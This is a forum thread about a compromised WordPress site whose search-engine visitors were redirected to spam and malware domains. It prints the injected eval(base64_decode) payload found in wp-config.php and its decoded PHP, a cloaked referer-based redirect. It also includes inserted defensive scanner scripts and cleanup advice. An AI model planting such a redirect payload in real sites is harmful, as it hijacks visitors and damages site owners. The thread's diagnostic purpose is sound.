Webpage being directed to SPAM

Hi guys,

I have an issue, but upon closer inspection the issue might be browser related.

I am not entirely sure what’s happening on my site, but I seem to get redirected from the site on Google to another site called “http://monkeyball.osa.pl/?said=3333g&q=corporate+identity+cyprus”. If you type Cyprus Corporate Identity you get my site near the top, it’s with a PricklyPear. From here, on my browser anyhow I get directed to this spam site. It was happening before when I set the site to Multisite.

Can anybody let me know why this is happening? I myself think it might be a browser related issue, maybe on outside machines something else happens.

I’ve just tried that using Yahoo! (because I wasn’t paying attention to what I was doing :) ) and your site came up top. Clicking on the link got me

Oops! Google Chrome could not find aruba.345.pl

345.pl and osa.pl both have very poor ratings on WOT; McAfee site advisor hasn’t ranked the first one, but about the second it says:

McAfee TrustedSource web reputation analysis found potential security risks with this site. Use with extreme caution.
I don’t know what’s going on, but it seems pretty safe to say it’s not an issue with your browser. :)

That makes things even worse! Can anybody assist me on this? I use Site5 as my host, I can probably flag the issue up with them, but maybe it would be good to see what people say here before I do anything.

OK - I tried again with Google and a different browser, and I got this:

I have no problem if I visit the site direct, so I don’t know what’s going on here.

Aruba is not my website though. This is another website. I am going to have to flag this up to the hosts. I have no idea what’s going on.

Sorry - I meant I can visit pricklypear direct without any problems.

I know the site can be visited directly without any issue. I am on LIVE chat with the hosting company and seeing what they can do, if anything. I am really unsure what’s going on, it’s all very strange.

Strange - I’ve tried with several browsers and Google is sending me to pricklypear as it should do, nothing dodgy at all.

Something is up. Ran a search on Google and when visiting your homepage I get:

Warning: Something’s Not Right Here!
www3.bestscannerfyn.rr.nu contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified www3.bestscannerfyn.rr.nu that we found malware on the site. For more about the problems found on www3.bestscannerfyn.rr.nu, visit the Google Safe

The other pages I clicked are redirecting to something weird as well. What does the host say?

I’d say the site has been compromised.

Nothing at the moment. The lady opened a ticket to flag up to the Technical team, I am unsure what they will say. Aren’t hosts supposed to protect against this thing? I feel something is playing in the domain name. I did a virus scan and it checked all the files and they seemed to be okay, I am not sure what else to do. I am using WP as the site suggests. I use a CDN but I don’t think that’s doing anything bad.

The word in from the host.

The hosts are really amazing, they eventually found the issue and cause of the problem.


eval(base64_decode("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 2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));

was found on the top of the wp-config file.

This translates to:


error_reporting(0);
$qazplm=headers_sent();
// Only act while a redirect header can still be sent
if (!$qazplm){
  $referer=$_SERVER['HTTP_REFERER'];
  $uag=$_SERVER['HTTP_USER_AGENT'];
  if ($uag) {
    // Fire only for visitors arriving from a search engine, social site or URL shortener
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\\.ru\\/yandsearch\\?(.*?)\\&lr\\=/",$referer) or preg_match ("/google\\.(.*?)\\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
      if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
        // Direct visits never reach this line, so the site looks normal to its owner
        header("Location: http://broadway.bee.pl/");
        exit();
      }
    }
  }
}

This made my website marked as SPAM! Apart from being listed on the top rank for Cyprus Corporate Identity I would be shunning business away with this spam. My host gave me excellent advice on keeping my WP installation and virus free. I feel this malicious code was part of a plug-in to do with social media.

I will think twice before I see any base code on my site!

I have found nothing on Google about this malicious code, so I hope this thread can be found by many to resolve an issue which took all day to resolve. Thanks again, and I am glad my site is now back to normal few
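Added example, not part of any post in this thread: a static scanner for the pattern found in wp-config above. It finds `eval(base64_decode("..."))` in PHP files, decodes the blob without running it, and reports any `Location:` redirect target and whether the payload inspects the Referer. The sample site, payload and `redirect.example` host are constructed for the demo.

```python
import base64, binascii, re, tempfile
from pathlib import Path

# Matches eval(base64_decode("...")) with either quote style and optional spaces.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)\s*\)")
LOCATION = re.compile(rb"header\s*\(\s*[\"']Location:\s*([^\"']+)", re.I)

def scan_file(path):
    """One finding per eval(base64_decode()) blob. The payload is decoded, never run."""
    data = Path(path).read_bytes()
    findings = []
    for m in EVAL_B64.finditer(data):
        try:
            decoded = base64.b64decode(b"".join(m.group(1).split()), validate=True)
        except (binascii.Error, ValueError):
            decoded = b""  # damaged or truncated blob: still reported, just not decoded
        findings.append({
            "file": Path(path).name,
            "line": data.count(b"\n", 0, m.start()) + 1,
            "redirects": [u.decode("latin-1").strip() for u in LOCATION.findall(decoded)],
            "checks_referer": b"HTTP_REFERER" in decoded,
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root, not only wp-config.php."""
    return [f for p in sorted(Path(root).rglob("*.php")) for f in scan_file(p)]

def demo():
    """Constructed sample site: one injected wp-config.php, one clean file."""
    payload = (b'$r=$_SERVER["HTTP_REFERER"];if(stristr($r,"google")){'
               b'header("Location: http://redirect.example/");exit();}')
    injected = b'<?php eval(base64_decode("' + base64.b64encode(payload) + b'")); ?>\n'
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "wp-config.php").write_bytes(injected + b"<?php define('DB_NAME', 'wp');\n")
        (Path(d) / "index.php").write_bytes(b"<?php require 'wp-blog-header.php';\n")
        return scan_tree(d)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A virus scan that only matches known signatures can miss this, because the redirect logic is visible only after decoding; the scanner flags the wrapper itself and shows where it would send visitors.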

I just wanted to check and make sure this got resolved ok? Our support would be happy to help,

Thanks, Ben
Site5 CEO

The issue was resolved, they did a brilliant job. The actual issue was a line of code which created the redirect.

I did something else when putting the security plug-ins which caused another issue and now I can’t log onto the CMS. I will try to solve this, if push comes to shove I will probably recreate the blog since I have the backups. I really don’t want to ask your team to help again, they did an amazing job and it’s not fair for me to ask for their help on my inexperience.

Kind regards,

I’m glad to hear they could help! Don’t worry that is what we are for if you need help :)

Thanks, Ben

I just had a similar issue with one of my hosted customers but the issue didn’t stop at just the wp-config file. In fact, they injected this code into several dozen of my files scattered throughout.

The best way to identify the files that contain this code is to look at the timestamp or date of modification on each file containing the code snippet. Each file had exactly the same time and date, which made it obvious for me to see which files were modified to contain this injected script.

All the basic WordPress files I simply uploaded over again using a clean WordPress install, but the wp-config and wp-content folders took some time to go through manually. They must have had some automated method of adding this to files because they were all at exactly the same time but also so many files were infected… I didn’t see any obvious areas, but this was injected into plugin and theme files without discrimination.

It’s a time consuming one to fix, but once you’re done… you are good to go. Hope this helps.
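Added example, not part of any post in this thread: the timestamp check described in the post above, generalised to two queries. One lists every file modified at the same moment as a file already known to be infected; the other finds groups of files across several directories that share one modification second. The file layout and timestamps are constructed for the demo.

```python
import os, tempfile
from collections import defaultdict
from pathlib import Path

def files_modified_with(root, known_infected, tolerance=1):
    """Files under root whose mtime is within `tolerance` seconds of a known-infected file."""
    ref = Path(known_infected).stat().st_mtime
    return sorted(p.relative_to(root).as_posix() for p in Path(root).rglob("*")
                  if p.is_file() and abs(p.stat().st_mtime - ref) <= tolerance)

def mtime_clusters(root, min_files=3):
    """Groups of files sharing one mtime second and spread over more than one directory."""
    groups = defaultdict(list)
    for p in Path(root).rglob("*"):
        if p.is_file():
            groups[int(p.stat().st_mtime)].append(p)
    return {ts: sorted(p.relative_to(root).as_posix() for p in paths)
            for ts, paths in groups.items()
            if len(paths) >= min_files and len({p.parent for p in paths}) > 1}

def demo(injected_at=1_300_000_000):
    """Constructed tree: three files stamped with the same second, two with older dates."""
    layout = {
        "wp-config.php": injected_at,
        "wp-content/themes/t/header.php": injected_at,
        "wp-content/plugins/p/p.php": injected_at,
        "index.php": 1_200_000_000,
        "wp-content/themes/t/style.css": 1_250_000_000,
    }
    with tempfile.TemporaryDirectory() as d:
        for rel, ts in layout.items():
            f = Path(d) / rel
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_text("<?php // constructed sample\n")
            os.utime(f, (ts, ts))  # set access and modification time explicitly
        return files_modified_with(d, Path(d) / "wp-config.php"), mtime_clusters(d)

if __name__ == "__main__":
    same_time, clusters = demo()
    print(same_time)
    print(clusters)
```

Modification times can be reset by whoever wrote the file, so a match is a lead for content inspection and a clean result is not proof that nothing else was changed.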

Since then I’ve done loads to prevent hacks. SSL certification all around, bulletproofing my WP installation. This might have been my website, but it would have been much worse if it was on a client’s site. Relatively easy to setup.

@dr00t;

Your example was far worse than mine, so I feel for you. What steps do you now take to prevent such a reoccurrence?